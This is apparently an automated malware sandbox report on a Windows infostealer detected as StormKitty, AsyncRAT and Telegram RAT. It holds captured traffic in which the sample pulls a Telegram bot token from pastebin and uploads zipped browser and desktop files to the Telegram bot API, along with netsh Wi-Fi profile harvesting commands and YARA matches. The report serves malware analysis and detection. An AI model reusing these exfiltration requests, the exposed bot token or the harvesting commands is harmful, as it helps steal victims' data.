2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: fa aa bf e2 50 ce 0f 23 9d 9b 3e 21 28 87 f7 49 e3 be ca 1c 19 ec 3a 84 19 c4 fa a3 cb fb 55 4e bf e1 d7 97 46 15 0d c8 28 7d 9f f9 41 6a e8 1f 4a bf e9 3a ab 1f 4d 29 b8 e1 96 89 8e 3a 4e 1f ac da c8 fc b3 23 13 d1 ec 1e 29 9d 56 da 5d 32 bc fe b4 49 f6 5d 66 89 bd 97 25 cb 28 84 ef 5c fa 89 c9 e2 d0 e7 3a 8b c9 0a 57 6e 5d b5 3d fa b3 55 da f6 cc 1d 91 a9 73 8e 4b c0 0f 9a 7a 1e 2e 67 ba a3 8c 91 03 42 eb 5c 58 a4 09 a7 75 8c 8c b3 de 9a d8 25 80 ab 6e 86 fe 12 d0 39 fa 4f a1 30 41 f4 67 ff 8d f2 8b 1d b5 99 b3 68 fe 01 95 95 04 24 6d fd 7c e9 c5 d3 6b 40 34 c3 61 4c 3c 8e 10 93 09 dd c2 be a1 a3 00 3e da 0c 97 d8 d3 52 31 aa 1e 10 b1 30 3a 59 af 60 f2 7a f0 53 6f b8 ef 78 8b b8 ae 5c 72 eb f0 2c d2 d4 fb fc 25 f7 2e b5 6c 9b b1 f5 ac 99 07 a9 d7 7b c8 Data Ascii: P#>!(I:UNF(}AjJ:M):N#)V]2I]f%(\:Wn]=UsKz.gB\Xu%n9O0Agh$m\|k@4aL<>R10:Y`zSox\r,%.l{
2025-01-10 18:09:06 UTC	891	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 18:09:06 GMT Content-Type: application/json Content-Length: 503 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":1661,"from":{"id":7935009733,"is_bot":true,"first_name":"jagaban","username":"ghandisbot"},"chat":{"id":6779103906,"first_name":"David Bhatti","username":"DaveeBhatti","type":"private"},"date":1736532546,"document":{"file_name":"C_UsersuserAppDataLocal50258fbd039b7763b78e3cbf6b4d4ee3fron.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIGfWeBYkIXtBp14waO18wGOfi7B6g2AAIgGgAC2swQUFKMyHFjnDXONgQ","file_unique_id":"AgADIBoAAtrMEFA","file_size":188596}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49813	172.67.19.24	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:06 UTC	74	OUT	GET /raw/7B75u64B HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2025-01-10 18:09:07 UTC	391	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:09:07 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Fri, 10 Jan 2025 18:09:07 GMT Server: cloudflare CF-RAY: 8ffe9dc14a954232-EWR
2025-01-10 18:09:07 UTC	52	IN	Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
2025-01-10 18:09:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49819	149.154.167.220	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:07 UTC	254	OUT	POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 Content-Type: multipart/form-data; boundary="fbae4b5c-7010-426f-9cdf-9140c1697daa" Host: api.telegram.org Content-Length: 188961 Expect: 100-continue
2025-01-10 18:09:08 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 18:09:08 UTC	40	OUT	Data Raw: 2d 2d 66 62 61 65 34 62 35 63 2d 37 30 31 30 2d 34 32 36 66 2d 39 63 64 66 2d 39 31 34 30 63 31 36 39 37 64 61 61 0d 0a Data Ascii: --fbae4b5c-7010-426f-9cdf-9140c1697daa
2025-01-10 18:09:08 UTC	281	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 66 72 6f 6e 74 64 65 73 6b 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 30 32 35 38 66 62 64 30 33 39 62 37 37 36 33 62 37 38 65 33 63 62 66 36 62 34 64 34 65 65 33 5c 66 72 6f 6e 74 64 65 73 6b 40 39 32 38 31 30 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 66 72 6f 6e 74 64 65 73 6b 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 30 32 35 38 66 62 64 30 33 39 62 37 37 36 33 62 37 38 65 33 63 62 66 36 62 34 64 34 65 65 33 25 35 43 66 72 6f 6e 74 64 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C50258fbd039b7763b78e3cbf6b4d4ee3%5Cuser
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 44 92 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 44 92 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 1a 69 2a 5a 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 1a 69 2a 5a bc dc 30 73 82 01 00 00 35 04 00 00 17 00 00 00 44 Data Ascii: PKDZBrowsers\Edge\PKDZBrowsers\Google\PKiZQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKiZ0s5D
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 3a 3d 6f e9 58 fe e6 6b 03 dd 90 47 a0 95 8d 8b dc 1e c6 e1 81 43 1f 96 13 4f 30 f2 9a 35 d6 c8 48 89 be 47 67 ec a1 94 90 72 d3 6b 36 6c 56 de 06 57 74 58 9a 0f 34 5e f0 7c 48 43 41 57 82 db 7d b1 56 1e ea 11 fa fd f9 03 50 4b 03 04 14 00 00 00 08 00 d5 1e 45 57 64 c1 35 a7 83 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 66 72 6f 6e 74 64 65 73 6b 5c 44 65 73 6b 74 6f 70 5c 53 4e 49 50 47 50 50 52 45 50 2e 70 6e 67 0d 93 47 8e 45 21 0c 04 f7 23 fd 43 11 4d b2 49 06 03 f7 3f c8 3c ef 5b 2e 95 ba 27 c5 06 ad 0d d7 b6 9d 27 a3 36 fd b8 3e 64 de 7a b3 85 d0 ce a4 cd b7 c8 6e b8 e2 69 f9 d8 e1 03 46 8a 5d fb c7 8d 37 f2 7c 4a e2 f1 25 98 9c 48 49 36 fd a2 0e 2b 7b 5b 63 d2 e7 94 45 9b 30 3b 5b 99 5b b3 25 Data Ascii: :=oXkGCO05HGgrk6lVWtX4^\|HCAW}VPKEWd56Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP.pngGE!#CMI?<[.''6>dzniF]7\|J%HI6+{[cE0;[[%
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 55 4e 4b 52 4c 43 56 4f 48 56 5c 55 4e 4b 52 4c 43 56 4f 48 56 2e 64 6f 63 78 15 93 49 8e 40 21 08 44 f7 9d f4 a1 9c 11 15 47 54 bc ff 41 fa 37 2b 02 81 50 79 05 53 1a d9 ec 0a 5b dd 06 15 d4 13 1b 8b 5e 22 2d 8b 96 cd ae e7 10 10 8d 37 71 19 57 42 2d a5 2d 73 73 c8 c2 0f de 29 8b 89 ab 67 16 c5 b6 cc a0 0f 26 55 a2 67 25 cb c6 b4 a5 b7 20 7d c6 b7 14 9d c9 f4 2c e8 41 95 66 e5 b3 19 9f d7 ad be 58 5e e5 b6 95 60 9a c8 99 41 86 30 d7 2c c7 1d 6f 44 3d 28 98 e0 f2 cb 0b dc f5 96 c6 8d dc eb 83 10 8a f5 30 af fa da 4d 8f 86 98 f6 be 5f 31 16 57 8a bf ae ea 8e b3 c8 9c a5 ed b9 99 30 e3 97 3b 0f 90 bd db ed 3c 6b 5d 4c 3d 54 6c 15 cf 3a 85 5a 74 fd 9e 5b 75 a6 6c 07 0d 0e 96 af f9 64 0e af 4e 99 53 94 a3 30 ce d0 11 ab 20 71 b1 72 c9 ba 35 7a 11 55 02 ca 4b Data Ascii: UNKRLCVOHV\UNKRLCVOHV.docxI@!DGTA7+PyS[^"-7qWB--ss)g&Ug% },AfX^`A0,oD=(0M_1W0;<k]L=Tl:Zt[uldNS0 qr5zUK
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 6f 63 78 0d 93 49 8e 45 21 0c 03 f7 2d fd 43 3d e6 84 29 8c 81 dc ff 20 cd 12 89 d8 a6 62 7c 9a d7 64 b3 c6 74 5f 37 7b 9a 59 c7 3a 3c 85 d4 e4 3b cc e2 ce a5 e5 7a 05 2a e5 aa d7 9e 80 35 e0 4d 21 2a 6d 0d 37 05 37 35 4a ee 14 d9 a7 8a 02 65 0a 40 d0 45 42 07 51 fa 2b f0 3d 35 e7 b0 1c af 39 41 82 10 f4 c5 20 c3 81 ac 65 82 4b cd b2 52 35 33 56 d1 71 7c f5 db f1 63 43 89 d2 a6 10 f2 1c 39 3a 1d 6e ca 82 37 4e 94 e5 49 8f b1 11 6b 54 3c e6 48 01 07 88 14 08 75 db 43 b9 8d f8 a9 e0 87 0f 6e f1 2e 93 a7 bf 3a 9d da 2c 7d 60 6f cf 89 b1 bc 80 96 e2 f9 82 8b b8 5a 30 41 85 fc ce cf e8 b4 9b 41 af 08 3b 94 4c 80 ab 93 53 46 ad c6 c1 cd b5 23 71 c6 b0 ab 2d 3e dc 5b 28 e3 4b 3a db b3 54 6f 60 3e 14 1f 2e 18 b4 f4 cb d2 1c 9f d2 a2 4f 83 3a a1 fd 00 9b 94 5b 2a Data Ascii: ocxIE!-C=) b\|dt_7{Y:<;z5M!m775Je@EBQ+=59A eKR53Vq\|cC9:n7NIkT<HuCn.:,}`oZ0AA;LSF#q->[(K:To`>.O:[*
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 9c 5c 40 cb c9 eb 1b c3 43 c1 af 72 3c 04 45 2f 57 a1 59 cf 48 63 d9 ec f0 f4 69 9c 56 9f a6 d2 f2 9c 4e f2 91 ea 66 a6 50 f3 3c 73 65 57 c0 b8 cb 64 d7 a1 ee 3e 73 f2 00 ff 42 9b 96 86 42 41 99 26 8d a0 25 d2 1b 37 65 d2 fa b5 be 70 9f 54 6b 6a d6 6f 80 34 00 6b dd 14 44 2a 3c 3e 35 40 aa 03 7d 76 39 aa 55 72 f7 a1 99 61 61 cb da 51 32 bc e0 ff 37 77 3d fa 17 10 57 5e a7 2c e2 11 c6 26 b9 4a cf 0c ae 27 0e 86 d3 75 38 83 92 e1 4a 9f ad d0 f1 24 bb 86 44 8f 5f 81 0c ed 93 af a3 6a 4b 5d d5 76 6e 2d 0d 5c c7 76 7d ca 65 88 70 5f 3d 47 4f e1 6c fa 9e df dd 6e d9 f7 76 a4 68 5a 90 b2 7b 95 23 ed 09 4a 35 e3 fb c6 c0 b5 98 6e a1 52 88 7c 83 8c 6e cc 51 17 4a 3f 5f 01 ed 52 bc 74 2e a3 04 1f 38 b0 eb cd 02 ef d7 51 2e 2d a5 cb 33 9f 71 c7 4f 5e 8c 49 19 69 7b Data Ascii: \@Cr<E/WYHciVNfP<seWd>sBBA&%7epTkjo4kD*<>5@}v9UraaQ27w=W^,&J'u8J$D_jK]vn-\v}ep_=GOlnvhZ{#J5nR\|nQJ?_Rt.8Q.-3qO^Ii{
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 7f 74 9f 11 ec cd 1d 11 e4 0f f8 e4 c8 9f 74 2f 0c 1c 55 99 34 9f 10 42 55 f4 f7 97 7c 69 60 db ce 07 b5 9d 13 66 6c f8 da db 76 0e 41 3f ea 08 35 34 bb 1e d5 4d 44 1f bc d1 31 68 3f 0d bb 3d 24 cc ca bc 2c 74 8f 50 84 82 01 0a 02 3c 60 83 e0 7e cd e9 fd bd 58 c9 f9 f3 03 99 88 87 87 95 8c bb 9f 69 40 30 d4 fa 8e 9b 5d 2d 93 36 ad e6 3a 0e d1 5b 3a 21 fa de a4 03 0f e3 64 3e ab 8a a7 7c 72 3b 56 f3 2f 5d 75 34 b2 e7 3f cf eb 45 24 5e 34 56 50 0a 61 48 0b b2 cc d0 6d 0c cf 5f a5 f9 a2 98 b5 05 74 66 6c 31 db 0e ee 0b 71 d4 11 43 05 85 b8 d0 9f e2 22 61 fe 24 70 94 3a 2a 2e 6a 9d 44 ec 30 85 27 66 85 ed 37 18 1a 58 d2 91 50 58 a2 c2 98 fa 59 85 25 57 4c f3 68 56 65 da a1 fa 1a 8a 88 6d 43 91 06 29 ac 7b 40 6f e4 2c 55 75 f5 bc a5 a1 f5 97 6e e0 7b 1d 47 be Data Ascii: tt/U4BU\|i`flvA?54MD1h?=$,tP<`~Xi@0]-6:[:!d>\|r;V/]u4?E$^4VPaHm_tfl1qC"a$p:*.jD0'f7XPXY%WLhVemC){@o,Uun{G
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: 66 20 d5 3e 8b a1 79 cd 38 e1 82 2d 0e d4 2c bf b9 8f f8 47 25 a1 45 a7 ed 3e 3e ed c6 5b f6 7c 76 42 1e e6 df d1 3a 25 30 03 0b dd 8c 36 63 43 e1 ce 62 e3 8a e1 23 f7 36 d3 88 e2 c2 be 92 d5 71 86 2e 94 eb d3 fc ce b5 d1 3c e1 9b c1 2f 7e d9 c5 b6 d5 0f b2 ae 30 fe 3c 1a bf 97 41 d7 3b b2 dd 95 4d 72 62 94 3b 65 d1 c7 d3 99 30 f0 a7 8b fa bd c9 cb 13 a2 7b 51 9f 47 7b ed a7 e8 f8 5f f6 07 e8 c2 c2 4d 26 2f 8d 68 e5 62 bb 86 35 5e ba d8 e4 f5 87 e9 5c 0f aa 73 f0 99 34 c4 c5 18 9c 12 2f 8d 82 12 ca da fc 24 b6 b7 b1 8d ba 7b bb b2 b2 3b d2 45 18 46 a6 9b 43 1e 75 f6 35 82 e8 33 14 11 c7 4c f2 4c a3 8c 0b 8d fa 6e f2 34 f3 0f de 1d d7 4b 00 cc ab 5a 50 01 75 87 76 78 0d a1 4c ce fa 6b b7 38 14 93 87 7e 98 8a a4 13 df c0 39 0f 40 3b 7c 67 af af 2b d2 d7 21 Data Ascii: f >y8-,G%E>>[\|vB:%06cCb#6q.</~0<A;Mrb;e0{QG{_M&/hb5^\s4/${;EFCu53LLn4KZPuvxLk8~9@;\|g+!
2025-01-10 18:09:08 UTC	16355	OUT	Data Raw: fa aa bf e2 50 ce 0f 23 9d 9b 3e 21 28 87 f7 49 e3 be ca 1c 19 ec 3a 84 19 c4 fa a3 cb fb 55 4e bf e1 d7 97 46 15 0d c8 28 7d 9f f9 41 6a e8 1f 4a bf e9 3a ab 1f 4d 29 b8 e1 96 89 8e 3a 4e 1f ac da c8 fc b3 23 13 d1 ec 1e 29 9d 56 da 5d 32 bc fe b4 49 f6 5d 66 89 bd 97 25 cb 28 84 ef 5c fa 89 c9 e2 d0 e7 3a 8b c9 0a 57 6e 5d b5 3d fa b3 55 da f6 cc 1d 91 a9 73 8e 4b c0 0f 9a 7a 1e 2e 67 ba a3 8c 91 03 42 eb 5c 58 a4 09 a7 75 8c 8c b3 de 9a d8 25 80 ab 6e 86 fe 12 d0 39 fa 4f a1 30 41 f4 67 ff 8d f2 8b 1d b5 99 b3 68 fe 01 95 95 04 24 6d fd 7c e9 c5 d3 6b 40 34 c3 61 4c 3c 8e 10 93 09 dd c2 be a1 a3 00 3e da 0c 97 d8 d3 52 31 aa 1e 10 b1 30 3a 59 af 60 f2 7a f0 53 6f b8 ef 78 8b b8 ae 5c 72 eb f0 2c d2 d4 fb fc 25 f7 2e b5 6c 9b b1 f5 ac 99 07 a9 d7 7b c8 Data Ascii: P#>!(I:UNF(}AjJ:M):N#)V]2I]f%(\:Wn]=UsKz.gB\Xu%n9O0Agh$m\|k@4aL<>R10:Y`zSox\r,%.l{
2025-01-10 18:09:08 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 18:09:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	1
Start time:	13:08:42
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\6mllsKaB2q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6mllsKaB2q.exe"
Imagebase:	0xbb0000
File size:	1'116'672 bytes
MD5 hash:	A7649256FCE8B15959EDD1004DF7781B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io Rule: rat_win_asyncrat, Description: Detect AsyncRAT based on specific strings, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:08:45
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6mllsKaB2q.exe"
Imagebase:	0x3c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x380000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1770000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x220000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x380000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:08:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1770000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3%
Total number of Nodes:	1995
Total number of Limit Nodes:	55

Executed Functions

Function 00BB42DE Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BB430D

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

GetCurrentProcess.KERNEL32(?,00C4CB64,00000000,?,?), ref: 00BB4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00BB4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BB4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BB4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BB4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00BB447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00BB44A0

Strings

|O, xrefs: 00BF36F8
, xrefs: 00BB42E8, 00BB435E, 00BF3617
GetNativeSystemInfo, xrefs: 00BB4460
kernel32.dll, xrefs: 00BB444F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

